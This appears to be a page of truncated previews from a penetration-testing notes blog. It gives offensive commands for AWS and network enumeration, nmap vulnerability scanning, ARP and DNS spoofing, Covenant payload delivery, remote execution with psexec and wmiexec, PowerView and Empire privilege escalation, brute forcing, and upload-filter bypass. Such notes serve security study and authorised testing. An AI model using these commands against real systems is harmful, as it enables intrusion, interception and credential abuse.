-
Pacu can be used to test an AWS account. Setup: Unauthorized enumeration Requires only an AWS access key and secret key. Enumerate roles. Create a list with possible roles to check. run iam__enum_roles --word-list /tmp/roles.txt --account-id $accountId Enumerate users which belong to a (previously found) role. Create also a list of possible user names. run iam__enum_users --word-list…
-
Initial (network) enumeration Check where a service is hosted by querying the nameserver records for our target domain: host -t ns $domain Get more information / confirmation via a whois query to one previously found domain. whois $previouslyFoundDomain Check where a host is running: host $domain host $ipFromTheDomain Check more domains of this organisation / of…
-
Files with the extension .Library-ms are similar to macOS’s Volumes. They can contain files and directories which look like local files in the Windows Explorer. Many AV/malware systems do not detect them currently. Create a Windows Library “Directory” Preparation: Install somewhere a DAV share which is reachable from the victim’s system and which points to a…
-
Short: A user opens a link (e.g. from a phishing email) which has an injection in the URL which is then executed on the site as long as the user is logged in. See also the command injections post. Classes: Tip:
-
See also the Web brute force post.
-
Nmap has its own scripting language with which complex or recurring tasks can be automated. See the manpage. And share/nmap/scripts. Vulnerability scan # nmap -sV -T5 -F $victim --script vuln | tee nmap-vuln.txt Better vulnerability scans (thanks to this source) cd /usr/share/nmap/scripts/vulscan/utilities/updater/ && ./updateFiles.sh nmap --script nmap-vulners -sV -sC -p22 $victim nmap --script vulscan -sV…
-
Mandatory Optional Use this script to list all endpoints for further research:
-
(!) If upload does not seem to work, change the suffix e.g. from .php to .pHp. More: File uploads / images
-
Bugs can only be found during fuzzing in code which is actually executed. But which parts of the code of a target system are executed during a fuzzing session? And how can we improve our fuzzer to also include tests for code blocks which weren’t covered before? Dynamorio We’ll now use Dynamorio, a runtime code manipulation…
-
Scapy fundamentals Commands for the interactive scapy interpreter: conf.iface shows the currently used interface conf.iface='tun0' sets the interface to use ls shows all protocols ls(TCP) shows all known headers for a given protocol lsc shows build-in functions Details about a packet p: p shows general information p.summary() shows also general information p.show() shows each field and…
-
mitmdump is a proxy which can store and modify content. Change content of a third-party site Scenario: You want to manipulate some content from a website $target visits. Perform ARP poisoning with Bettercap, Ettercap, the http_hijack.py script or somehow else. Start mitmdump in transparent mode: mitmdump --mode transparent --replace /~s/wars/trek/ or alternatively to read the new content from a…
-
An Ettercap successor, written in Go. Basic commands: Passive ARP probing: net.recon on net.recon off Active probing: net.probe on net.probe off Sniffing: set net.sniff.output /tmp/sniff.pcap // optional net.sniff on net.sniff off Spoofing: set arp.spoof.targets $target1, $target2, $target3 arp.spoof on arp.spoof off DNS Spoofing: set dns.spoof.domains target.domain // the domain which should be resolved as… set…
-
.NET attack framework: https://github.com/cobbr/Covenant Usage Create a listener on the attack system. Add a launcher to the listener. The attack system now provides a payload file the victim has to start. You can use UrbanBishop to inject the payload into a running process. As soon as the payload is executed, Covenant will show on the dashboard…
-
Various Show who else is logged in. qwinsta Open the Event Viewer and search in the logs. Have fun! Network enumeration Show the network configuration. Are there multiple interfaces? ipconfig /all Routing information route print Show current network connections. After checking this command: CHECK all ports against the previously found ones! netstat -ano Check the ARP cache…
-
With username/password With psexec (Prerequisites: ADMIN$ share is available, the user is part of the local administrator group on the target) With psexec via Metasploit use exploit/windows/smb/psexec With atexec (Impacket) atexec.py dom/user:pass@$target cmd.exe With wmiexec wmiexec.py domain.local/$target:$password@$ip With Smbmap smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target With Wmic (To run a…
-
Source on Github Creates screenshots from a list of URLs. Good way to quickly get an overview of a new site. With nmap, use -oA file to save the output also as an XML file. EyeWitness can read this file via -x file and make screenshots of all of these sites. EyeWitness.py --web -x webservers.xml
-
The usual order Network scan Detect hosts for a domain (use Seclist): for ip in $(cat common-subdomains.txt); do host $ip.megacorpone.com; done Reverse lookup: Find domains for addresses: for ip in $(seq 155 190); do host 50.7.67.$ip; done | grep -v "not found" Zonefile enumeration Grab zonefile from a random target domain: host -a -l fraunhofer.de ns3.fraunhofer.de…
-
Try these resources if you can access files, but not list them. http://pwnwiki.io/#!presence/windows/blind.md Cheat sheet 1 List In Apache and probably more systems you can “travel over” non-existing files because the path is shortened before the existence of a file is checked. Example: /test/test.txt/../../index.html will return the root’s index.html on Apache even if the test directory and…
-
Without shell access With shell access Choose one method to enumerate. 1. User and group enumeration with net (!) See what roles/privileges THIS USER has. Also locally. Maybe he/she already has administrative privileges. whoami /all List (and store!) the users of the domain net user /domain List (and store!) information like full names, group memberships, etc.…
-
Collection of privesc scripts. To start, upload PowerView.ps1 and: powershell -exec bypass PS> Import-Module .\PowerView.ps1 See the github site for all commands. General enumeration powershell -exec bypass PS> . .\PowerUp.ps1 PS> Invoke-AllChecks Or: powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks" About users Enumerates all users. Get-NetUser Enumerate all users which do not require Kerberos preauth. Get-NetUser -PreauthNotRequired Returns…
-
Mainly post exploitation for AD environments. (Download, also included in the Kali sources) Quick usage for privilege escalation General usage Metasploit syntax / PSE syntax Note: After usemodule don’t forget to go “back” and to “interact” with the agent to see job results! Commands with an asterisk require a high-integrity Empire Agent. To upgrade one…
-
See the Impacket site for a short description of all tools. Tip: On Kali, use the command impacket-* Enumeration without authentication Determine the system architecture getArch.py -target $target Returns the listening RPC interface IDs. ifmap.py $target 135 rpcdump.py $target Enumeration with half authentication Scenario: You have credentials for one AD user. Then, try to get all users for…
-
Tools to detect nmap -O nmap-chronos Tools to detect and validate p0f JS to list browser characteristics which could be sent back to an attacker via an AJAX request: /itsec/wp-content/uploads/2021/05/browser_detection.html Tools to impersonate Against browser/JS-based fingerprinting: Just tamper with values from the browser in about:config.
-
With Medusa Doesn’t seem to work with virtual hosts! medusa -h 10.11.1.49 -u bethany -P Dog_Names_normalized.txt -M http -m DIR:/~Public -T 2 With ncrack Doesn’t seem to work with virtual hosts! ncrack -vv --user bethany -P Dog_Names_normalized.txt http://10.11.1.49:9505 -m http:path=/~Public/ With metasploit Use module auxiliary/scanner/http/http_login Virtual hosts If Host headers are not supported: More
-
https://github.com/Tib3rius/AutoRecon Multi recon tool for broad scanning
-
Download: https://github.com/droope/droopescan droopescan scan drupal -u http://$target/ -t 32 Or just install via pip pip install droopescan
-
https://tools.kali.org/exploitation-tools/commix Creates SQL injections on the fly.